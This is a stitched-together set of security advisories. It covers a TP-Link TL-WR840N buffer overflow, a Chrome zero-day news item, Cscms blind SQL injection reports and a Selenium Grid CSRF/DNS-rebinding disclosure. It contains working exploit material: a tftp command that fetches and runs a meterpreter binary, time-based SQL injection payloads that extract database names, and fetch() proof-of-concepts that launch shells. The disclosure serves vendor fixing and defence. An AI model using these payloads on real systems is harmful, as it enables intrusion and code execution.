Tp-Link TL-WR840N (EU) v6.20 Firmware (0.9.1 4.17 v0001.0 Build 201124 Rel.64328n) is vulnerable to Buffer Overflow via the Password reset feature.

Home

#TPLINK, #CVE, #crash, #rce

Last Modified: 2022.04.15.

**Story**

I had a few days off during the winter break and played with the router firmware a bit. I only planned to deal with this for a day or two, but the problem was so much fun that I ended up spending a lot more time on it. Unfortunately, I didn’t have time to completely complete the exploit, but most of the problems have already been solved.

Is it possible exploiting the vulnerability? I think yes.

As soon as I have the mood and time, I will finish and update the report.

I sent the report to the TP-Link Security Team. The report was accepted and the firmware was fixed.

**Summary**

TP-Link TL-WR840N (EU) v6.20 contains a buffer overflow vulnerability in the httpd process. The attacker may can get a shell of the router by sending a message through the network. The affected feature is the Password Reset feature.

**Note:** To exploit the vulnerability the password is necessary.

*   **Hardware:** TP-Link TL-WR840N (EU) v6.20
*   **Firmware:** 0.9.1 4.17 v0001.0 Build 201124 Rel.64328n
*   **Authentication required:** Yes

The vulnerability is fixed in the following firmware: TL-WR840N(EU)\_V6.2\_220120.

I highly recommend upgrading the firmware to the latest version "TL-WR840N(EU)\_V6.2\_220120". It can be downloaded from the vendor homepage.

I would like to say thank you to the TP-Link Security Team.

**Timeline**

*   2021.12.31 - TP-Link Security Team informed about the vulnerability.
*   2021.12.31 - MITRE informed about the vulnerability.
*   2022.01.04 - TP-Link sent a response.
*   2022.01.04 - Report updated.
*   2022.01.04 - Report updated.
*   2022.01.10 - New Beta Firmware.
*   2022.01.18 - The beta Firmware checked (k4m1ll0).
*   2022.01.20 - Further discussion.
*   2022.02.15 - The new firmware published: TL-WR840N(EU)\_V6.2\_220120
*   2022.04.15 - Advisory published.
*   2022.04.15 - CVE ID requested.

**Technical Details****UART Shell**

After some soldering, the UART interface is available and usable. The UART shell runs with administrative privileges. The UART shell was used for debugging and it is not necessary to Exploit the vulnerability.

Note: No password is required for the UART.

![02](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/02.png) ![01](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/01.png)**Encrypted parameters**

The router administration interface is accessible via HTTP.

This router uses HTTP messages, but some parameters are encrypted. Understanding the encryption process is key to testing router parameters.

The following screenshot contains a HTTP message with encrypted parameters. The important part is the **"sign"** and **"data"** parameters.

![3](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/03.png)

There are 4 JavaScript file that are important.

*   CryptoJS.min.js - Standard cryptography library
*   encrypt.js - Vendor specific (?), it contains RSA implementation
*   tpEncrypt.js - Vendor specific, it contains the encryption logic
*   lib.js - "main"

The following simplified diagram visualize the encryption process:

![5](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/05.png)

Note: The "login request" is slightly different from the other requests

![6](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/06.png)

Example POST /CGI?8 request and response:

Notes:

*   No authentication
*   Parameters are not encrypted
*   It does not change (session related)

![7](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/07.png)

"Lib.js" – AESEncrypt Firefox – JavaScript Debugger (Pretty print source)

![8](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/08.png)

This is an important place, because the "s.data" parameter contains the plaintext (request) parameters, and it is possible to modify it before the encryption.

Real life parameter example with Firefox and JavaScript Debug console:

![9](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/09.png)

The HTTP response is also encrypted, the relevant breakpoint is the following (lib.js):

![10](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/10.png)

Note: "INCLUDE\_LOGIN\_GDPR\_ENCRYPT" parameter manipulation did not work.

**Reproduce the vulnerability (crash)**To reproduce the crash only a browser is necessary. The steps are the following:

1.  Login
2.  Open JavaScript Console and use the Debugging interface
3.  Prepare some break points (lib.js)
4.  Select (System Tools->Password)
5.  Fill the form and click the "save"
6.  With the debugger (manipulate) the request and continue the execution.

The following screenshot contains the "ps" command output. From the vulnerability point of view the "httpd" process is important, because it will crash later.

![11](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/11.png)

During this demo a Firefox browser was in use. With the built in "Pretty print source" feature the "lib.js" JavaScript file displayed.

Two breakpoints were set on lines 365 and 367:

![12](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/12.png)

The plaintext parameters stored in the "s.data" variable. The execution will stop here and with the JavaScript console it is possible to manipulate the parameters.

After login (192.168.1.1 in this case) select System Tools -> Password (Reset Form)

![13](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/13.png)

Hit the breakpoint:

![14](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/14.png)

Debugger:

![15](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/15.png)

In the JavaScript Console the parameters are visible. In this case the old password was "admin2":

![16](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/16.png)

The "pwd" parameter changed from "admin1" to 1500 "A"-s.

![17](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/17.png)

Continue the execution and crash will occur. The HTTP server is not accessible:

![18](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/18.png)

The "httpd" is missing from the "ps" command output:

![19](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/19.png)

"netstat" command output:

![21](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/21.png)**Httpd crash analysis**

Preparing the environment:

    
    # copy busybox
    tftp -g -r busybox-mipsel -l /var/tmp/busybox-mipsel 192.168.1.101
    
    # copy gdbserver
    tftp -g -r gdbserver -l /var/tmp/gdbserver 192.168.1.101
    
    ## ps -> httpd process 321
    
    ## gdbserver
    /var/tmp # ./gdbserver localhost:2000 --attach 321
    
    ## copy and paste debug script
    
    cd /var/tmp;
    tftp -g -r gdbserver -l /var/tmp/gdbserver 192.168.1.101;
    chmod +x /var/tmp/gdbserver;
    ./gdbserver localhost:2000 --attach 321 &
    

Debug script (client):

![22](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/22.png)

    
    # gdb attach
    gdb-multiarch -x debugscript
    

Reproduce the crash and check the stack trace with gdb:

![23](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/23.png)

The relevant functions restored with ghidra.

1.  dm\_fillObjByStr (libcmm.so)
2.  dm\_checkString (libcmm.so)
3.  dm\_checkParamNodeString (libcmm.so)
4.  rdp\_setObj (httpd)
5.  http\_rpm\_auth\_main (httpd)

**"dm\_fillObjByStr"**

The relevant local variables marked with red:

![24](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/24.png)

The overflow occurs in the following "strncpy" call:

![25](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/25.png)

The crash that is visible above is a side effect only, because of the incorrect parameter of the "dm\_setParamNodeString" function.

If the parameter is not correct the httpd process could crash multiple places:

*   inside "dm\_checkString" function
*   inside "dm\_setParamNodeString" function
*   inside "dm\_fillObjByStr -> cdbg\_printf" (marked with pink)

**Checking the binary**

The crash itself is a vulnerability, but probably a reverse shell can be obtained.

**Binary Protections**![26](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/26.png) ![27](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/27.png)

**It is possible to execute instructions from the stack.**

Plan B is a ROP chain.

**ASLR is enabled:**![28](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/28.png)**Howto Exploit it???**

It is not easy, but (at least in theory) it is possible. The following sections contain the most important problems and solutions.

**Problems****The MIPS "cache problem"**

MIPS and the cache could destroy the payloads, a well-known technique to avoid cache issues is a "sleep" function call.

It tested with a small test binary on the device and it worked.

**"Code execution" part**

It is possible to generate a proper binary with the msfvenom tool. The tftp command can be used to execute copy the binary. The binary can be executed the following way:

    
    # copy and execute k44 binary (meterpreter, multi handler, mipsle)
    system("tftp -g -r k44 -l k44 /var/tmp/shell 192.168.1.101; chmod +x k44;/var/tmp/k44")
    

It tested on the device and it worked. :)

**JavaScript encryption and raw bytes sending problem.**

From the browser it is hard to send complex payloads. The problem is the Unicode conversion e.g.:

![29](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/29.png)

Note: Browser input works with "simple" characters.

Quick recap about the encryption:

![30](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/30.png)

An example:

![31](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/31.png)

There is a problem with the manual sign generation. The manually produced sign parameter is not accepted by the firmware.

It is very inconvenient to send the parameters through a browser, so it is worth automating. I made a quick and dirty solution:

1.  I implemented "data encryption" part in python3.
2.  The parameters are coming from the JavaScript console with a manual alert.
3.  I modified the encrypt.js (TP-Link) a little bit and it reused with spidermonkey JS engine to produce the sign value.

data encryption example:

![32](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/32.png)

sign example:

![33](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/33.png)**encrypt.js modifications:**

new random function:

![34](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/34.png)

"getRandomValues" and remove unnecessary parts:

![35](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/35.png)

Handle the parameters:

![36](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/36.png)**Example usage:**

After login collect the variables with an alert:

![37](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/37.png)

Use the parameters with the poc script:

![38](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/38.png)

Use the encrypted parameters and send the request with burp.

Crash occures and the "BCDE" bytes are in the good place in the debugger:

![39](https://k4m1ll0.com/cve-TLWR840Nv620_password_reset/39.png)

Notes:

1.  The toolchain is just a quick and dirty solution. It works, but further automation is necessary.
2.  The input is an UTF-8 string and not an "ascii" string. It is not trivial to use the "characters" because of the representation. e.g.: \\x90-> \\x90\\x00. This must be solved.

**Open Topics**

Unfortunately, I did not have time to move on, but I really want to finish.

There are only two problems left the "UTF-8 encoding problem and the " and the "dm\_setParamNodeString" side effect problem.

**Notes about the "dm\_setParamNodeString" side effect problem:**

*   The whole thing is extremely funny. It crashes in a debug line before the real "crash". It is not a protection mechanism, it is a bug. :).
*   With the debugger, I was able to manipulate the memory to solve partly the issue.
*   Note: The address contains 4 byte and \\x00 byte is not allowed.

Update is coming...

© 2019-2022 Kamilló Matek (<ᚫᛗIᛚᛚᛟ) All Rights Reserved

CVE-2021-46122: TP-Link TL-WR840N v6.20(EU) Password Reset vulnerability

Flaw allowed malicious JavaScript to be embedded in an SVG file

XSS vulnerability in open source tool PrivateBin patched

Google patches a critical flaw in its Chrome browser, bringing its count of zero-day vulnerabilities fixed in 2022 to four.

Google fixed two vulnerabilities in its Chrome web browser as part of an emergency update this week, including a type confusion vulnerability that is already being exploited in the wild.

The type confusion vulnerability (CVE-2022-1364) impacts the JavaScript and WebAssembly engine in the browser. With this kind of flaw, a program will allocate a resource (such as a pointer or object) using one type but will later try to access the resource using an incompatible type. The vulnerability can be exploited to cause the browser to crash, trigger logical errors, or even execute arbitrary code.

"Google is aware that an exploit for CVE-2022-1364 exists in the wild," the company wrote in the alert. Details will be restricted until a majority of users have updated to Chrome version 100.0.4896.127 across the Windows, Linux, and Mac platforms.

The issues also affect other Chromium-based browsers, such as Microsoft Edge, Brave, and Vivaldi.

The second issue that was fixed appears to be related to issues that were uncovered internally. The alert calls it "various fixes from internal audits, fuzzing, and other initiatives."

This is the third emergency update for Chrome in 2022, and the third zero-day vulnerability patched so far this year. In March, Google (along with Microsoft) fixed a critical flaw to the Chromium v8 JavaScript engine (CVE-2022-1096) that was being actively exploited.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Emergency Update Fixes Chrome Zero-Day

A zero-code remote code injection vulnerability via configuration.php in Chamilo LMS v1.11.13 allows attackers to upload arbitrary code in the form of a new plugin.

CVE-2022-27427: Security issues - Chamilo LMS

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Lists.php_zhuan.

    POST /admin.php/dance/admin/lists/zhuan HTTP/1.1
    Host: cscms.test
    Content-Length: 23
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/lists?v=7131
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=n9lv1ptm53932qcefgtfamknehtiv096;XDEBUG_SESSION=PHPSTORM
    Connection: close
    
    id[]=(sleep(5))&cid=5
    

`(case(1)when(ascii(substr((select(database()))from(1)for(1)))=99)then(sleep(5))else(1)end)`

Because the first letter of the background database name is "c", it sleeps for 5 seconds

CVE-2022-27368: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #15 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Topic.php_del.

**There is a SQL blind injection vulnerability in dance\_Topic.php\_del****Details**

After the administrator is logged in, you need to add a song album

![image](https://user-images.githubusercontent.com/96719328/158503082-c3569a79-6b79-45d1-aeaf-5c6cd0d5bb47.png)

    POST /admin.php/dance/admin/topic/save HTTP/1.1
    Host: cscms.test
    Content-Length: 240
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    cid=0&tid=0&yid=0&color=&addtime=ok&name=1&pic=&tags=&fxgs=&yuyan=%E5%9B%BD%E8%AF%AD&diqu=%E5%A4%A7%E9%99%86&year=2022&user=&singer=&skins=topic-show.html&hits=0&yhits=0&zhits=0&rhits=0&shits=0&neir=&file=&title=&keywords=&description=&id=0
    

![image](https://user-images.githubusercontent.com/96719328/158503152-17fb9fba-1b55-4e8d-a2cf-e01efd11f401.png)

When deleting a song album, malicious statements can be constructed to achieve sql injection

![image](https://user-images.githubusercontent.com/96719328/158503192-0dcc9d08-41ae-4705-9de6-b72418ae0129.png)

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(sleep(5))--+
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158503234-312aa3f5-5fe1-4f0c-99f5-93f4c98cc6c6.png)

contrust payload

    POST /admin.php/dance/admin/topic/del HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/topic?v=800
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=gksbvndtoeofhn69rntmjp01p1n8hqj9
    Connection: close
    
    id=3)and(if(substr((select+database()),1,1)='c'sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158503304-240ee76b-708f-4393-ab13-a2ad4a0d8478.png)

![image](https://user-images.githubusercontent.com/96719328/158503427-84ef4372-0fa8-45f7-b01f-a9d50df7d686.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158503481-46e35f70-11ee-4206-b51a-10a3ad1357f4.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27367: SQL injection vulnerability exists in Cscms music portal system v4.2(dance_Topic.php_del) · Issue #14 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component dance_Dance.php_del.

**SQL injection vulnerability exists in Cscms music portal system v4.2**

There is a SQL blind injection vulnerability in dance\_Dance.php\_del

**Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158499410-c2be7972-449a-4534-b767-c01d6b108373.png)  
POC

    POST /admin.php/dance/admin/dance/save HTTP/1.1
    Host: cscms.test
    Content-Length: 292
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_session=vh1bscpjrcvfiil1mcr4qhgo9ri1dck8; cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA
    Connection: close
    
    cid=1&addtime=ok&name=1&color=&pic=&user=&cion=0&purl=&durl=&reco=0&tid=0&fid=0&zc=&zq=&bq=&hy=&singer=&dx=&yz=&sc=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&shits=0&xhits=0&vip=0&level=0&wpurl=&wppass=&skins=play.html&gc=0&text=&file=&lrc=&title=&keywords=&description=&id=0&sid=0
    

![image](https://user-images.githubusercontent.com/96719328/158499490-a9851157-3ebc-4535-992a-06086a6d06f5.png)

When deleting songs in the recycle bin, construct malicious statements and implement sql injection

    POST /admin.php/dance/admin/dance/del?yid=3 HTTP/1.1
    Host: cscms.test
    Content-Length: 21
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=kpqu73c98lvqmbbkebu36pbd3pferpdb
    Connection: close
    
    id=7)and(sleep(5))--+
    

![image](https://user-images.githubusercontent.com/96719328/158499667-567c12f1-99ea-4bef-91a0-c0afeb93a4d2.png)

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158499784-ff7a6921-f1a0-4a60-97b3-a9b5cd4ae202.png)

![image](https://user-images.githubusercontent.com/96719328/158499809-e7e71538-9381-4e31-aecb-e5fd6701b7ad.png)

![image](https://user-images.githubusercontent.com/96719328/158499898-d5a1570a-4735-4074-86eb-760c08c6406a.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code

![image](https://user-images.githubusercontent.com/96719328/158499941-b34c8fbd-bd70-409c-a874-04abbb2f0ec9.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27365: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #12 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a blind SQL injection vulnerability via the component dance_Dance.php_hy.

**There is a SQL blind injection vulnerability in dance\_Dance.php\_hy****Details**

Add a song after administrator login  
![image](https://user-images.githubusercontent.com/96719328/158500746-50c27c84-05ac-4d5b-b206-695c60f63e51.png)

Add songs first and then delete them into the trash

![image](https://user-images.githubusercontent.com/96719328/158500808-df6007b2-2032-4aa0-96f1-b230c5dd15f8.png)

![image](https://user-images.githubusercontent.com/96719328/158500843-0a8fb76e-2255-42a9-8088-373d58c33c2d.png)

When restoring songs in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158500952-abbb9bc3-b741-47e2-9874-006edcabbc9f.png)

    GET /admin.php/dance/admin/dance/hy?id=10)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    

The parameter "id" exists time blind, sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158501001-7b2a3508-5f84-4a52-af2c-8121237c8433.png)

construct payload

    GET /admin.php/dance/admin/dance/hy?id=10)and(if(substr((select+database()),1,1)='c',sleep(5),1)--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/dance/admin/dance?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=r3kc74ivbu10hbssd9s03lqd0n1mu0g6
    Connection: close
    
    

In the figure below, you can see that the first letter of the database is "c", so it sleeps for 5 seconds to verify that the injection exists

![image](https://user-images.githubusercontent.com/96719328/158501196-0862a524-881b-4c3f-814d-1645a92e7fa3.png)

![image](https://user-images.githubusercontent.com/96719328/158501168-cccab3c8-b7b4-45e6-aa48-5e661f1795bd.png)

CVE-2022-27366: SQL injection vulnerability exists in Cscms music portal system v4.2 · Issue #13 · chshcms/cscms

Cscms Music Portal System v4.2 was discovered to contain a SQL injection vulnerability via the component news_News.php_hy.

**There is a SQL blind injection vulnerability in news\_News.php\_hy****Details**

After the administrator is logged in, a news needs to be added

![image](https://user-images.githubusercontent.com/96719328/158506380-f537906e-5519-4a24-822f-1a21bfc8fdd5.png)

    POST /admin.php/news/admin/news/save HTTP/1.1
    Host: cscms.test
    Content-Length: 204
    Accept: application/json, text/javascript, */*; q=0.01
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://cscms.test
    Referer: http://cscms.test/admin.php/news/admin/news/edit
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=5apla1fdentnsdis6lbq25n548poo682
    Connection: close
    
    cid=1&tid=0&reco=1&color=&name=1&addtime=ok&info=1&pic=&pic2=&tags=&hits=0&yhits=0&zhits=0&rhits=0&dhits=0&chits=0&user=&cion=0&vip=0&level=0&skins=&content=&file=&title=&keywords=&description=&id=0&yid=0
    

![image](https://user-images.githubusercontent.com/96719328/158506454-ac41f81b-55f9-446e-83c8-370f13ddf6cd.png)

delete this article to trash

![image](https://user-images.githubusercontent.com/96719328/158506605-052ebc0a-1e3c-4ace-95a5-dc01f56c80ab.png)

When restoring articles in the recycle bin, construct malicious statements and implement sql injection

![image](https://user-images.githubusercontent.com/96719328/158507281-5c2d57d4-0cda-4883-a3f7-27f06f46579b.png)

    GET /admin.php/news/admin/news/hy?id=5)and(sleep(5))--+ HTTP/1.1
    Host: cscms.test
    Accept: application/json, text/javascript, */*; q=0.01
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
    X-Requested-With: XMLHttpRequest
    Referer: http://cscms.test/admin.php/news/admin/news?yid=3
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: cscms_admin_id=3HtLFUmqgin4; cscms_admin_login=6hHRwKPiGz1%2FN9C4hmVHcOkF4oyCoI8lNzjjyeMF3fURy57grmVzbA; cscms_session=7qpsm1cblear8tgkbflk5mdl7qa7k23f
    Connection: close
    

The payload executes and sleeps for 5 seconds

![image](https://user-images.githubusercontent.com/96719328/158507341-3c9ca5e8-ba6e-4a91-8bc5-5f3d189301c6.png)

![image](https://user-images.githubusercontent.com/96719328/158507430-e4febc1c-b33d-4438-8508-596db0888ace.png)

![image](https://user-images.githubusercontent.com/96719328/158507454-dd256638-00df-4b86-8c3b-ac044267a311.png)

Because the first letter of the background database name is "c", it sleeps for 5 seconds

Vulnerability source code  
\\News::hy

![image](https://user-images.githubusercontent.com/96719328/158507501-c6516d6f-0c77-40b5-8877-d8c756f54180.png)

Close "id" to achieve blind injection, so the vulnerability exists

CVE-2022-27369: SQL injection vulnerability exists in Cscms music portal system v4.2(news_News.php_hy) · Issue #16 · chshcms/cscms

Selenium Selenium Grid (formerly Selenium Standalone Server) Fixed in 4.0.0-alpha-7 is affected by: DNS rebinding. The impact is: execute arbitrary code (remote). The component is: WebDriver endpoint of Selenium Grid / Selenium Standalone Server. The attack vector is: Triggered by browsing to to a malicious remote web server. The WebDriver endpoint of Selenium Server (Grid) is vulnerable to DNS rebinding. This can be used to execute arbitrary code on the machine.

Feb 7 2022

computer security web vulnerability webdriver csrf dns-rebinding advisory

CVE-2022-28108 CVE-2022-28109

**Previous episode:** DNS rebinding vulnerability to RCE in geckodriver

Vulnerabilities in found on the WebDriver endpoints of Selenium Server (Grid).

Selenium Server (Grid) is vulnerable to Cross-Site Request Forgery (CSRF) and DNS-rebinding attacks. This is CVE-2022-28108 and CVE-2022-28109 respectively. These vulnerabilities can be exploited to execute arbitrary system commands (remote command execution) through both geckodriver and chromedriver. This was fixed in 4.0.0-alpha-7.

**CSRF****Proof-of-concept**

In this example, we show how we can achieve RCE with CSRF through geckodriver:

`async function main() {   await fetch("http://localhost:4444/wd/hub/session", {       method: "POST",       mode: 'no-cors',       headers: {           'Content-Type': 'text/plain'         },       body: JSON.stringify({         "capabilities": {           "browserName": "firefox",           "alwaysMatch": {             "moz:firefoxOptions": {               "binary": "/bin/bash",               "args": ["posix", "+n", "-c", 'bash -c "$1"', "bash", "xterm -e nyancat"]             }           }         }       }),   }); } main();`

This vulnerability has been tested on:

*   geckodriver 0.26.0 (e9783a644016 2019-10-10 13:38 +0000);
*   ChromeDriver 81.0.4044.92 (e98e6f21168a55e7ba57202f56323911cd9d31d1-refs/branch-heads/4044@{#883});
*   Debian testing.

Note that as part of the fix for CVE-2020-15660, newer versions of GeckoDriver do not execute arbitrary code through this method. It is however possible to execute arbitrary code by shipping custom Firefox configuration:

It is possible to execute arbitrary code through chromedriver as well:

`fetch("http://localhost:4444/wd/hub/session", {     method: "POST",     mode: 'no-cors',     headers: {         'Content-Type': 'text/plain'     },     body: JSON.stringify({         "capabilities": {             "browserName": "chrome",             "alwaysMatch": {                 "goog:chromeOptions": {                     "binary": "/usr/bin/python3",                     "args": ["-cimport os;os.system('xterm -e nyancat')"]                 }             }         }     }), });`

**Mitigations****Content-Type Validation**

CSRF is possible because selenium-standalone-server accepts requests with any `Content-Type`. Another origin can make POST requests to selenium-standalone-server using the following content-types: `application/x-www-form-urlencoded`, `multipart/form-data`, `text/plain`.

selenium-standalone-server could fix this vulnerability by rejecting these content-types. selenium-standalone-server could even reject all requests which do not have a JSON content-type. This seems to be a violation of the WebDriver specification which does not mandate a JSON content-type for WebDriver POST requests.

It looks like this is a defect of the WebDriver specification which encourages CSRF attacks on WebDriver servers (a similar issue has been reported on another implementation). The specification should explicitly allow a server-side implementation of the WebDriver to reject dangerous content-types and should require the client-side to use a JSON content-type. Additionally, the security section of the WebDriver specification should probably mention the risks of CSRF attacks.

